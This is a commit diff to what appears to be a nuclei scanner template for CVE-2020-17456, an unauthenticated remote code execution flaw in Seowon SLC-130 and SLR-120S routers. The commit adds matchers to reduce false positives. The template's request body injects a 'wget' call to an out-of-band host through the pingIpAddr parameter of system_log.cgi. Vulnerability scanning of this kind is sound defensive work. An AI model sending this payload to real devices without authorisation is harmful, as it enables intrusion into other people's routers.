Fix CVE-2020-17456 (false positive) (#3997)
* Fix CVE-2020-17456 (false positive) * additional matchers Co-authored-by: sandeep <sandeep@projectdiscovery.io>patch-1
gilfoyle97
GitHub
parent
28afc48724
commit
91db326b54
|
|
@ -2,7 +2,7 @@ id: CVE-2020-17456
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Seowon SLC-130 And SLR-120S - Unauthenticated Remote Code Execution
|
name: Seowon SLC-130 And SLR-120S - Unauthenticated Remote Code Execution
|
||||||
author: gy741
|
author: gy741,edoardottt
|
||||||
severity: critical
|
severity: critical
|
||||||
description: SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page.
|
description: SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page.
|
||||||
reference:
|
reference:
|
||||||
|
|
@ -31,9 +31,20 @@ requests:
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://{{interactsh-url}}&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018
|
||||||
|
|
||||||
cookie-reuse: true
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol
|
part: interactsh_protocol
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "http"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
Loading…
Reference in New Issue